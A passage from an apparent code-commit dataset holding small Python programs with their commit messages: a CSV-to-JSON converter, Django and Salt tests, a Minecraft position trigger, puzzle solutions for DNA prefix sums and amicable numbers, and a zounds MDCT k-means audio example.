if args.json_file is not None:
json_file_name = args.json_file
try:
jsonfile = open(json_file_name, 'w')
except Exception as e:
print 'Could not open JSON file to write: "%s"' % json_file_name
raise e
reader = csv.DictReader(csvfile)
data = []
for row in reader:
if row['Purchaser'].startswith('...'):
continue # skip header rows
date = row['Date'].split('/') # 4/31/2014
row['Date'] = '%s-%s-%s' % (date[2], date[0].zfill(2), date[1].zfill(2)) # 2014-04-31
transaction = dict()
for key, value in row.items():
key = key.rsplit(' owes...', 1)[0]
key = key.lower()
if key in ['amount', 'cartland', 'npstanford', 'rcrabb', 'stromme']:
if value:
value = sub(r'[^\d\-.]', '', value)
transaction[key] = value
data.append(transaction)
json.dump(data, jsonfile)
|
|
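Two small transformations carry most of the weight in the converter above: reordering M/D/YYYY dates into ISO form and stripping currency formatting down to a signed decimal string. Both are easy to isolate and verify on their own (a Python 3 sketch; the converter itself is Python 2):

import re

def iso_date(us_date):
    month, day, year = us_date.split('/')
    return '%s-%s-%s' % (year, month.zfill(2), day.zfill(2))

def clean_amount(value):
    # keep digits, minus sign and decimal point only
    return re.sub(r'[^\d\-.]', '', value)

assert iso_date('4/1/2014') == '2014-04-01'
assert clean_amount('-$1,234.56') == '-1234.56'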
37f22e55abf84c39846245fde53baf441dde7bff
|
tests/filter/test_paged_filterset.py
|
tests/filter/test_paged_filterset.py
|
from tests.apps.questions import models as question_models
from adhocracy4.filters.filters import PagedFilterSet
class TextFilter(PagedFilterSet):
class Meta:
model = question_models.Question
fields = ['text']
def test_page_clean_query(rf):
request = rf.get('/questions', {
'page': 1
})
filterset = TextFilter(data=request.GET, request=request)
assert 'page' not in filterset.data
|
Test to ensure GET data is cleaned from page arg
|
Test to ensure GET data is cleaned from page arg
|
Python
|
agpl-3.0
|
liqd/adhocracy4,liqd/adhocracy4,liqd/adhocracy4,liqd/adhocracy4
|
Test to ensure GET data is cleaned from page arg
|
from tests.apps.questions import models as question_models
from adhocracy4.filters.filters import PagedFilterSet
class TextFilter(PagedFilterSet):
class Meta:
model = question_models.Question
fields = ['text']
def test_page_clean_query(rf):
request = rf.get('/questions', {
'page': 1
})
filterset = TextFilter(data=request.GET, request=request)
assert 'page' not in filterset.data
|
<commit_before><commit_msg>Test to ensure GET data is cleaned from page arg<commit_after>
|
from tests.apps.questions import models as question_models
from adhocracy4.filters.filters import PagedFilterSet
class TextFilter(PagedFilterSet):
class Meta:
model = question_models.Question
fields = ['text']
def test_page_clean_query(rf):
request = rf.get('/questions', {
'page': 1
})
filterset = TextFilter(data=request.GET, request=request)
assert 'page' not in filterset.data
|
Test to ensure GET data is cleaned from page argfrom tests.apps.questions import models as question_models
from adhocracy4.filters.filters import PagedFilterSet
class TextFilter(PagedFilterSet):
class Meta:
model = question_models.Question
fields = ['text']
def test_page_clean_query(rf):
request = rf.get('/questions', {
'page': 1
})
filterset = TextFilter(data=request.GET, request=request)
assert 'page' not in filterset.data
|
<commit_before><commit_msg>Test to ensure GET data is cleaned from page arg<commit_after>from tests.apps.questions import models as question_models
from adhocracy4.filters.filters import PagedFilterSet
class TextFilter(PagedFilterSet):
class Meta:
model = question_models.Question
fields = ['text']
def test_page_clean_query(rf):
request = rf.get('/questions', {
'page': 1
})
filterset = TextFilter(data=request.GET, request=request)
assert 'page' not in filterset.data
|
|
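The behaviour under test — a filterset whose bound data no longer contains the paging argument — boils down to copying the immutable request.GET and popping the key before binding. A plausible sketch of that mechanism, assuming PagedFilterSet does something along these lines (it works on plain dicts and Django QueryDicts alike):

def strip_page_param(querydict, key='page'):
    """Return a mutable copy of the query data without the paging key."""
    data = querydict.copy()   # request.GET itself is immutable
    data.pop(key, None)
    return data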
f24fb7c26fd64d1039fc02318d42c89064c57cfc
|
tests/integration/shell/arguments.py
|
tests/integration/shell/arguments.py
|
# -*- coding: utf-8 -*-
'''
Test Salt's argument parser
'''
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath, requires_salt_modules
ensure_in_syspath('../../')
# Import Salt libs
from salt.exceptions import SaltInvocationError
import integration
@requires_salt_modules('test.ping')
class ArgumentTestCase(integration.ModuleCase):
def test_unsupported_kwarg(self):
'''
Test passing a non-supported keyword argument
'''
self.assertEqual(
self.run_function('test.ping', ['foo=bar']),
("ERROR executing 'test.ping': The following keyword arguments "
"are not valid: foo=bar")
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ArgumentTestCase)
|
Add test for unsupported kwarg
|
Add test for unsupported kwarg
|
Python
|
apache-2.0
|
saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt
|
Add test for unsupported kwarg
|
# -*- coding: utf-8 -*-
'''
Test Salt's argument parser
'''
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath, requires_salt_modules
ensure_in_syspath('../../')
# Import Salt libs
from salt.exceptions import SaltInvocationError
import integration
@requires_salt_modules('test.ping')
class ArgumentTestCase(integration.ModuleCase):
def test_unsupported_kwarg(self):
'''
Test passing a non-supported keyword argument
'''
self.assertEqual(
self.run_function('test.ping', ['foo=bar']),
("ERROR executing 'test.ping': The following keyword arguments "
"are not valid: foo=bar")
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ArgumentTestCase)
|
<commit_before><commit_msg>Add test for unsupported kwarg<commit_after>
|
# -*- coding: utf-8 -*-
'''
Test Salt's argument parser
'''
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath, requires_salt_modules
ensure_in_syspath('../../')
# Import Salt libs
from salt.exceptions import SaltInvocationError
import integration
@requires_salt_modules('test.ping')
class ArgumentTestCase(integration.ModuleCase):
def test_unsupported_kwarg(self):
'''
Test passing a non-supported keyword argument
'''
self.assertEqual(
self.run_function('test.ping', ['foo=bar']),
("ERROR executing 'test.ping': The following keyword arguments "
"are not valid: foo=bar")
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ArgumentTestCase)
|
Add test for unsupported kwarg# -*- coding: utf-8 -*-
'''
Test Salt's argument parser
'''
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath, requires_salt_modules
ensure_in_syspath('../../')
# Import Salt libs
from salt.exceptions import SaltInvocationError
import integration
@requires_salt_modules('test.ping')
class ArgumentTestCase(integration.ModuleCase):
def test_unsupported_kwarg(self):
'''
Test passing a non-supported keyword argument
'''
self.assertEqual(
self.run_function('test.ping', ['foo=bar']),
("ERROR executing 'test.ping': The following keyword arguments "
"are not valid: foo=bar")
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ArgumentTestCase)
|
<commit_before><commit_msg>Add test for unsupported kwarg<commit_after># -*- coding: utf-8 -*-
'''
Test Salt's argument parser
'''
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath, requires_salt_modules
ensure_in_syspath('../../')
# Import Salt libs
from salt.exceptions import SaltInvocationError
import integration
@requires_salt_modules('test.ping')
class ArgumentTestCase(integration.ModuleCase):
def test_unsupported_kwarg(self):
'''
Test passing a non-supported keyword argument
'''
self.assertEqual(
self.run_function('test.ping', ['foo=bar']),
("ERROR executing 'test.ping': The following keyword arguments "
"are not valid: foo=bar")
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ArgumentTestCase)
|
|
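The error string asserted above suggests the loader compares the kwargs parsed off the command line against the function's accepted argument names and reports the leftovers. A toy version of that check using inspect — an illustration of the idea, not Salt's actual implementation:

import inspect

def invalid_kwargs(func, kwargs):
    accepted = set(inspect.signature(func).parameters)
    return {k: v for k, v in kwargs.items() if k not in accepted}

def ping():
    return True

bad = invalid_kwargs(ping, {'foo': 'bar'})
if bad:
    print("ERROR executing 'test.ping': The following keyword arguments "
          "are not valid: " + ', '.join('%s=%s' % kv for kv in bad.items()))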
3b53634f1888db8bc25e3b0bcf4eeb3b837ae370
|
playerAction.py
|
playerAction.py
|
import mcpi.minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
while True:
pos = mc.player.getPos()
x = pos.x
y = pos.y
z = pos.z
# Display position
#print x, y, z
time.sleep(2)
if x >= 343.300 and y <= 344.700 and z <= -301.300 and z >= -302.700 and y == 4:
print "Active action"
mc.postToChat("Active action")
|
Add player position action script
|
Add player position action script
|
Python
|
mit
|
Nekrofage/MinecraftPython
|
Add player position action script
|
import mcpi.minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
while True:
pos = mc.player.getPos()
x = pos.x
y = pos.y
z = pos.z
# Display position
#print x, y, z
time.sleep(2)
if x >= 343.300 and y <= 344.700 and z <= -301.300 and z >= -302.700 and y == 4:
print "Active action"
mc.postToChat("Active action")
|
<commit_before><commit_msg>Add player position action script<commit_after>
|
import mcpi.minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
while True:
pos = mc.player.getPos()
x = pos.x
y = pos.y
z = pos.z
# Display position
#print x, y, z
time.sleep(2)
if x >= 343.300 and y <= 344.700 and z <= -301.300 and z >= -302.700 and y == 4:
print "Active action"
mc.postToChat("Active action")
|
Add player position action scriptimport mcpi.minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
while True:
pos = mc.player.getPos()
x = pos.x
y = pos.y
z = pos.z
# Display position
#print x, y, z
time.sleep(2)
if x >= 343.300 and y <= 344.700 and z <= -301.300 and z >= -302.700 and y == 4:
print "Active action"
mc.postToChat("Active action")
|
<commit_before><commit_msg>Add player position action script<commit_after>import mcpi.minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
while True:
pos = mc.player.getPos()
x = pos.x
y = pos.y
z = pos.z
# Display position
#print x, y, z
time.sleep(2)
if x >= 343.300 and y <= 344.700 and z <= -301.300 and z >= -302.700 and y == 4:
print "Active action"
mc.postToChat("Active action")
|
|
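The trigger condition in the script above packs x, y and z bounds into one line, which makes it easy to misread. A small helper that checks an axis-aligned box makes the intent explicit (the ranges below reuse the script's coordinates, and the y comparison is widened to an interval since getPos() returns floats):

def in_box(pos, x_range, y_range, z_range):
    return (x_range[0] <= pos.x <= x_range[1] and
            y_range[0] <= pos.y <= y_range[1] and
            z_range[0] <= pos.z <= z_range[1])

# usage inside the polling loop:
# if in_box(pos, (343.3, 344.7), (3.5, 4.5), (-302.7, -301.3)):
#     mc.postToChat("Active action")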
97942a6a79ddc269adeb761cc6e2a4aadb94dc65
|
samples/prepare_samples.py
|
samples/prepare_samples.py
|
#!/usr/bin/env python
"""
Prepares for running samples.
It just generates maf.py and copies maf.py and waf to each sample directory.
Please run this script before trying these samples.
"""
import glob
import os
import shutil
import subprocess
if __name__ == '__main__':
os.chdir('..')
subprocess.check_call('./generate_maf.py')
os.chdir('samples')
for d in glob.glob('*/'):
for f in '../maf.py', '../waf':
shutil.copy(f, d)
|
Add script to copy maf.py and waf
|
Add script to copy maf.py and waf
|
Python
|
bsd-2-clause
|
pfi/maf,pfi/maf
|
Add script to copy maf.py and waf
|
#!/usr/bin/env python
"""
Prepares for running samples.
It just generates maf.py and copies maf.py and waf to each sample directory.
Please run this script before trying these samples.
"""
import glob
import os
import shutil
import subprocess
if __name__ == '__main__':
os.chdir('..')
subprocess.check_call('./generate_maf.py')
os.chdir('samples')
for d in glob.glob('*/'):
for f in '../maf.py', '../waf':
shutil.copy(f, d)
|
<commit_before><commit_msg>Add script to copy maf.py and waf<commit_after>
|
#!/usr/bin/env python
"""
Prepares for running samples.
It just generates maf.py and copies maf.py and waf to each sample directory.
Please run this script before trying these samples.
"""
import glob
import os
import shutil
import subprocess
if __name__ == '__main__':
os.chdir('..')
subprocess.check_call('./generate_maf.py')
os.chdir('samples')
for d in glob.glob('*/'):
for f in '../maf.py', '../waf':
shutil.copy(f, d)
|
Add script to copy maf.py and waf#!/usr/bin/env python
"""
Prepares for running samples.
It just generates maf.py and copies maf.py and waf to each sample directory.
Please run this script before trying these samples.
"""
import glob
import os
import shutil
import subprocess
if __name__ == '__main__':
os.chdir('..')
subprocess.check_call('./generate_maf.py')
os.chdir('samples')
for d in glob.glob('*/'):
for f in '../maf.py', '../waf':
shutil.copy(f, d)
|
<commit_before><commit_msg>Add script to copy maf.py and waf<commit_after>#!/usr/bin/env python
"""
Prepares for running samples.
It just generates maf.py and copies maf.py and waf to each sample directory.
Please run this script before trying these samples.
"""
import glob
import os
import shutil
import subprocess
if __name__ == '__main__':
os.chdir('..')
subprocess.check_call('./generate_maf.py')
os.chdir('samples')
for d in glob.glob('*/'):
for f in '../maf.py', '../waf':
shutil.copy(f, d)
|
|
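Because the script relies on two chdir() calls, running it from anywhere other than samples/ silently breaks the relative paths. An equivalent sketch anchored to the script's own location avoids that (paths assumed to match the repository layout implied above):

import glob
import os
import shutil
import subprocess

root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
subprocess.check_call(os.path.join(root, 'generate_maf.py'))
for d in glob.glob(os.path.join(root, 'samples', '*/')):
    for f in ('maf.py', 'waf'):
        shutil.copy(os.path.join(root, f), d)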
2de13254866d829089670135ac5844ceaff8994f
|
prefix_sums/min_impact_in_dna_sequence.py
|
prefix_sums/min_impact_in_dna_sequence.py
|
def get_prefix_sum(A):
result = [0] * (len(A) + 1)
for i in xrange(1, len(A) + 1):
result[i] = result[i - 1] + A[i -1]
return result
def solution(S, P, Q):
hasA = get_prefix_sum([s == 'A' for s in S])
hasC = get_prefix_sum([s == 'C' for s in S])
hasG = get_prefix_sum([s == 'G' for s in S])
hasT = get_prefix_sum([s == 'T' for s in S])
result = [0] * len(P)
for i in xrange(len(P)):
p = P[i]
q = Q[i]
if hasA[q+1] - hasA[p] > 0:
result[i] = 1
elif hasC[q+1] - hasC[p] > 0:
result[i] = 2
elif hasG[q+1] - hasG[p] > 0:
result[i] = 3
elif hasT[q+1] - hasT[p] > 0:
result[i] = 4
return result
|
Add algorithm for min impact calculation of DNA seq.
|
Add algorithm for min impact calculation of DNA seq.
|
Python
|
apache-2.0
|
isendel/algorithms
|
Add algorithm for min impact calculation of DNA seq.
|
def get_prefix_sum(A):
result = [0] * (len(A) + 1)
for i in xrange(1, len(A) + 1):
result[i] = result[i - 1] + A[i -1]
return result
def solution(S, P, Q):
hasA = get_prefix_sum([s == 'A' for s in S])
hasC = get_prefix_sum([s == 'C' for s in S])
hasG = get_prefix_sum([s == 'G' for s in S])
hasT = get_prefix_sum([s == 'T' for s in S])
result = [0] * len(P)
for i in xrange(len(P)):
p = P[i]
q = Q[i]
if hasA[q+1] - hasA[p] > 0:
result[i] = 1
elif hasC[q+1] - hasC[p] > 0:
result[i] = 2
elif hasG[q+1] - hasG[p] > 0:
result[i] = 3
elif hasT[q+1] - hasT[p] > 0:
result[i] = 4
return result
|
<commit_before><commit_msg>Add algorithm for min impact calculation of DNA seq.<commit_after>
|
def get_prefix_sum(A):
result = [0] * (len(A) + 1)
for i in xrange(1, len(A) + 1):
result[i] = result[i - 1] + A[i -1]
return result
def solution(S, P, Q):
hasA = get_prefix_sum([s == 'A' for s in S])
hasC = get_prefix_sum([s == 'C' for s in S])
hasG = get_prefix_sum([s == 'G' for s in S])
hasT = get_prefix_sum([s == 'T' for s in S])
result = [0] * len(P)
for i in xrange(len(P)):
p = P[i]
q = Q[i]
if hasA[q+1] - hasA[p] > 0:
result[i] = 1
elif hasC[q+1] - hasC[p] > 0:
result[i] = 2
elif hasG[q+1] - hasG[p] > 0:
result[i] = 3
elif hasT[q+1] - hasT[p] > 0:
result[i] = 4
return result
|
Add algorithm for min impact calculation of DNA seq.def get_prefix_sum(A):
result = [0] * (len(A) + 1)
for i in xrange(1, len(A) + 1):
result[i] = result[i - 1] + A[i -1]
return result
def solution(S, P, Q):
hasA = get_prefix_sum([s == 'A' for s in S])
hasC = get_prefix_sum([s == 'C' for s in S])
hasG = get_prefix_sum([s == 'G' for s in S])
hasT = get_prefix_sum([s == 'T' for s in S])
result = [0] * len(P)
for i in xrange(len(P)):
p = P[i]
q = Q[i]
if hasA[q+1] - hasA[p] > 0:
result[i] = 1
elif hasC[q+1] - hasC[p] > 0:
result[i] = 2
elif hasG[q+1] - hasG[p] > 0:
result[i] = 3
elif hasT[q+1] - hasT[p] > 0:
result[i] = 4
return result
|
<commit_before><commit_msg>Add algorithm for min impact calculation of DNA seq.<commit_after>def get_prefix_sum(A):
result = [0] * (len(A) + 1)
for i in xrange(1, len(A) + 1):
result[i] = result[i - 1] + A[i -1]
return result
def solution(S, P, Q):
hasA = get_prefix_sum([s == 'A' for s in S])
hasC = get_prefix_sum([s == 'C' for s in S])
hasG = get_prefix_sum([s == 'G' for s in S])
hasT = get_prefix_sum([s == 'T' for s in S])
result = [0] * len(P)
for i in xrange(len(P)):
p = P[i]
q = Q[i]
if hasA[q+1] - hasA[p] > 0:
result[i] = 1
elif hasC[q+1] - hasC[p] > 0:
result[i] = 2
elif hasG[q+1] - hasG[p] > 0:
result[i] = 3
elif hasT[q+1] - hasT[p] > 0:
result[i] = 4
return result
|
|
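The trick in the solution above is that hasX[q+1] - hasX[p] counts occurrences of nucleotide X inside S[p..q] in O(1), so each query needs at most four subtractions, tried in impact order A < C < G < T. The prefix-sum building block is easy to verify in isolation (a Python 3 sketch, since the solution uses xrange):

def prefix_sum(flags):
    out = [0]
    for f in flags:
        out.append(out[-1] + f)
    return out

S = 'CAGCCTA'
has_a = prefix_sum([s == 'A' for s in S])
# number of A's in all of 'CAGCCTA' (there are two)
assert has_a[7] - has_a[0] == 2
# S[2..4] == 'GCC' contains no A, so the minimal impact there is C (2)
assert has_a[5] - has_a[2] == 0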
9e024eec337a4d1fabdf570d65cd841eac204a6f
|
project_euler/021.amicable_numbers.py
|
project_euler/021.amicable_numbers.py
|
'''
Problem 021
Let d(n) be defined as the sum of proper divisors of n (numbers less than n
which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and
each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55
and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71
and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
Solution: Copyright 2017 Dave Cuthbert, MIT License
'''
import math
from collections import defaultdict
class DivisorSums():
sum_cache = defaultdict(lambda:1)
def _init_(self):
self.sum_cache
def add_value(self, n1, n2):
self.sum_cache[n1] = n2
def get_value(self, n1):
return self.sum_cache[n1]
def find_divisors(n):
divisors = {1}
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
divisors.add(int(n / i))
divisors.add(i)
return divisors
def check_if_amicable(n1, n2):
if cached.get_value(n1) == 1:
cached.add_value(n1, sum(find_divisors(n1)))
if cached.get_value(n1) == n2:
return True
return False
def solve_problem(end_number):
amicable_numbers = set()
for n in range(1, end_number):
divisor_list = find_divisors(n)
list_sum = sum(divisor_list)
cached.add_value(n, list_sum)
if (list_sum != n):
if check_if_amicable(list_sum, n):
amicable_numbers.update([list_sum, n])
return(amicable_numbers)
if __name__ == "__main__":
ending_number = 10000
cached = DivisorSums()
print(sum(solve_problem(ending_number)))
|
Solve amicable numbers with cache
|
Solve amicable numbers with cache
|
Python
|
mit
|
daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various,daveinnyc/various
|
Solve amicable numbers with cache
|
'''
Problem 021
Let d(n) be defined as the sum of proper divisors of n (numbers less than n
which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and
each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55
and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71
and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
Solution: Copyright 2017 Dave Cuthbert, MIT License
'''
import math
from collections import defaultdict
class DivisorSums():
sum_cache = defaultdict(lambda:1)
def _init_(self):
self.sum_cache
def add_value(self, n1, n2):
self.sum_cache[n1] = n2
def get_value(self, n1):
return self.sum_cache[n1]
def find_divisors(n):
divisors = {1}
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
divisors.add(int(n / i))
divisors.add(i)
return divisors
def check_if_amicable(n1, n2):
if cached.get_value(n1) == 1:
cached.add_value(n1, sum(find_divisors(n1)))
if cached.get_value(n1) == n2:
return True
return False
def solve_problem(end_number):
amicable_numbers = set()
for n in range(1, end_number):
divisor_list = find_divisors(n)
list_sum = sum(divisor_list)
cached.add_value(n, list_sum)
if (list_sum != n):
if check_if_amicable(list_sum, n):
amicable_numbers.update([list_sum, n])
return(amicable_numbers)
if __name__ == "__main__":
ending_number = 10000
cached = DivisorSums()
print(sum(solve_problem(ending_number)))
|
<commit_before><commit_msg>Solve amicable numbers with cache<commit_after>
|
'''
Problem 021
Let d(n) be defined as the sum of proper divisors of n (numbers less than n
which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and
each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55
and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71
and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
Solution: Copyright 2017 Dave Cuthbert, MIT License
'''
import math
from collections import defaultdict
class DivisorSums():
sum_cache = defaultdict(lambda:1)
def _init_(self):
self.sum_cache
def add_value(self, n1, n2):
self.sum_cache[n1] = n2
def get_value(self, n1):
return self.sum_cache[n1]
def find_divisors(n):
divisors = {1}
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
divisors.add(int(n / i))
divisors.add(i)
return divisors
def check_if_amicable(n1, n2):
if cached.get_value(n1) == 1:
cached.add_value(n1, sum(find_divisors(n1)))
if cached.get_value(n1) == n2:
return True
return False
def solve_problem(end_number):
amicable_numbers = set()
for n in range(1, end_number):
divisor_list = find_divisors(n)
list_sum = sum(divisor_list)
cached.add_value(n, list_sum)
if (list_sum != n):
if check_if_amicable(list_sum, n):
amicable_numbers.update([list_sum, n])
return(amicable_numbers)
if __name__ == "__main__":
ending_number = 10000
cached = DivisorSums()
print(sum(solve_problem(ending_number)))
|
Solve amicable numbers with cache'''
Problem 021
Let d(n) be defined as the sum of proper divisors of n (numbers less than n
which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and
each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55
and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71
and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
Solution: Copyright 2017 Dave Cuthbert, MIT License
'''
import math
from collections import defaultdict
class DivisorSums():
sum_cache = defaultdict(lambda:1)
def _init_(self):
self.sum_cache
def add_value(self, n1, n2):
self.sum_cache[n1] = n2
def get_value(self, n1):
return self.sum_cache[n1]
def find_divisors(n):
divisors = {1}
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
divisors.add(int(n / i))
divisors.add(i)
return divisors
def check_if_amicable(n1, n2):
if cached.get_value(n1) == 1:
cached.add_value(n1, sum(find_divisors(n1)))
if cached.get_value(n1) == n2:
return True
return False
def solve_problem(end_number):
amicable_numbers = set()
for n in range(1, end_number):
divisor_list = find_divisors(n)
list_sum = sum(divisor_list)
cached.add_value(n, list_sum)
if (list_sum != n):
if check_if_amicable(list_sum, n):
amicable_numbers.update([list_sum, n])
return(amicable_numbers)
if __name__ == "__main__":
ending_number = 10000
cached = DivisorSums()
print(sum(solve_problem(ending_number)))
|
<commit_before><commit_msg>Solve amicable numbers with cache<commit_after>'''
Problem 021
Let d(n) be defined as the sum of proper divisors of n (numbers less than n
which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and
each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55
and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71
and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
Solution: Copyright 2017 Dave Cuthbert, MIT License
'''
import math
from collections import defaultdict
class DivisorSums():
sum_cache = defaultdict(lambda:1)
def _init_(self):
self.sum_cache
def add_value(self, n1, n2):
self.sum_cache[n1] = n2
def get_value(self, n1):
return self.sum_cache[n1]
def find_divisors(n):
divisors = {1}
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
divisors.add(int(n / i))
divisors.add(i)
return divisors
def check_if_amicable(n1, n2):
if cached.get_value(n1) == 1:
cached.add_value(n1, sum(find_divisors(n1)))
if cached.get_value(n1) == n2:
return True
return False
def solve_problem(end_number):
amicable_numbers = set()
for n in range(1, end_number):
divisor_list = find_divisors(n)
list_sum = sum(divisor_list)
cached.add_value(n, list_sum)
if (list_sum != n):
if check_if_amicable(list_sum, n):
amicable_numbers.update([list_sum, n])
return(amicable_numbers)
if __name__ == "__main__":
ending_number = 10000
cached = DivisorSums()
print(sum(solve_problem(ending_number)))
|
|
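Note that the DivisorSums class above spells its constructor _init_ rather than __init__, so it is never invoked — the code still works only because sum_cache is a class attribute. A cache-free cross-check of the d(n) definition confirms the classic pair from the problem statement:

import math

def d(n):
    """Sum of proper divisors of n (for n > 1)."""
    total = 1
    for i in range(2, int(math.sqrt(n)) + 1):
        if n % i == 0:
            total += i
            other = n // i
            if other != i:   # avoid double-counting a square root divisor
                total += other
    return total

assert d(220) == 284 and d(284) == 220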
513b64423999f85f0cbc9cc0a44d6ef5962dd171
|
examples/mdct_synth.py
|
examples/mdct_synth.py
|
import featureflow as ff
import zounds
from random import choice
samplerate = zounds.SR11025()
BaseDocument = zounds.stft(resample_to=samplerate)
@zounds.simple_lmdb_settings('mdct_synth', map_size=1e10)
class Document(BaseDocument):
mdct = zounds.TimeFrequencyRepresentationFeature(
zounds.MDCT,
needs=BaseDocument.windowed,
store=True)
bark = zounds.ConstantRateTimeSeriesFeature(
zounds.BarkBands,
needs=BaseDocument.fft,
store=True)
@zounds.simple_settings
class DctKmeans(ff.BaseModel):
docs = ff.Feature(
ff.IteratorNode,
store=False)
shuffle = ff.NumpyFeature(
zounds.ReservoirSampler,
nsamples=1e6,
needs=docs,
store=True)
log = ff.PickleFeature(
zounds.Log,
needs=shuffle,
store=False)
unit_norm = ff.PickleFeature(
zounds.UnitNorm,
needs=log,
store=False)
kmeans = ff.PickleFeature(
zounds.KMeans,
centroids=512,
needs=unit_norm,
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(log, unit_norm, kmeans),
store=True)
@zounds.simple_lmdb_settings('mdct_synth_with_codes', map_size=1e10)
class WithCodes(Document):
kmeans = zounds.ConstantRateTimeSeriesFeature(
zounds.Learned,
learned=DctKmeans(),
needs=Document.mdct,
store=True)
if __name__ == '__main__':
# stream all the audio files from the zip archive
filename = 'FlavioGaete22.zip'
print 'Processing Audio...'
for zf in ff.iter_zip(filename):
if '._' in zf.filename:
continue
print zf.filename
Document.process(meta=zf)
# learn k-means clusters for the mdct frames
print 'learning k-means clusters'
DctKmeans.process(docs=(doc.mdct for doc in Document))
synth = zounds.MDCTSynthesizer()
docs = list(doc for doc in WithCodes)
kmeans = DctKmeans()
def random_reconstruction():
doc = choice(docs)
transform_result = kmeans.pipeline.transform(doc.mdct)
recon_mdct = transform_result.inverse_transform()
recon_audio = synth.synthesize(recon_mdct)
return doc.ogg, recon_audio
app = zounds.ZoundsApp(
model=Document,
audio_feature=Document.ogg,
visualization_feature=Document.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
Add new example for a simple k-means encoded MDCT synthesizer
|
Add new example for a simple k-means encoded MDCT synthesizer
|
Python
|
mit
|
JohnVinyard/zounds,JohnVinyard/zounds,JohnVinyard/zounds,JohnVinyard/zounds
|
Add new example for a simple k-means encoded MDCT synthesizer
|
import featureflow as ff
import zounds
from random import choice
samplerate = zounds.SR11025()
BaseDocument = zounds.stft(resample_to=samplerate)
@zounds.simple_lmdb_settings('mdct_synth', map_size=1e10)
class Document(BaseDocument):
mdct = zounds.TimeFrequencyRepresentationFeature(
zounds.MDCT,
needs=BaseDocument.windowed,
store=True)
bark = zounds.ConstantRateTimeSeriesFeature(
zounds.BarkBands,
needs=BaseDocument.fft,
store=True)
@zounds.simple_settings
class DctKmeans(ff.BaseModel):
docs = ff.Feature(
ff.IteratorNode,
store=False)
shuffle = ff.NumpyFeature(
zounds.ReservoirSampler,
nsamples=1e6,
needs=docs,
store=True)
log = ff.PickleFeature(
zounds.Log,
needs=shuffle,
store=False)
unit_norm = ff.PickleFeature(
zounds.UnitNorm,
needs=log,
store=False)
kmeans = ff.PickleFeature(
zounds.KMeans,
centroids=512,
needs=unit_norm,
store=False)
pipeline = ff.PickleFeature(
zounds.PreprocessingPipeline,
needs=(log, unit_norm, kmeans),
store=True)
@zounds.simple_lmdb_settings('mdct_synth_with_codes', map_size=1e10)
class WithCodes(Document):
kmeans = zounds.ConstantRateTimeSeriesFeature(
zounds.Learned,
learned=DctKmeans(),
needs=Document.mdct,
store=True)
if __name__ == '__main__':
# stream all the audio files from the zip archive
filename = 'FlavioGaete22.zip'
print 'Processing Audio...'
for zf in ff.iter_zip(filename):
if '._' in zf.filename:
continue
print zf.filename
Document.process(meta=zf)
# learn k-means clusters for the mdct frames
print 'learning k-means clusters'
DctKmeans.process(docs=(doc.mdct for doc in Document))
synth = zounds.MDCTSynthesizer()
docs = list(doc for doc in WithCodes)
kmeans = DctKmeans()
def random_reconstruction():
doc = choice(docs)
transform_result = kmeans.pipeline.transform(doc.mdct)
recon_mdct = transform_result.inverse_transform()
recon_audio = synth.synthesize(recon_mdct)
return doc.ogg, recon_audio
app = zounds.ZoundsApp(
model=Document,
audio_feature=Document.ogg,
visualization_feature=Document.bark,
globals=globals(),
locals=locals())
app.start(8888)
|
<commit_before><commit_msg>Add new example for a simple k-means encoded MDCT synthesizer<commit_after>
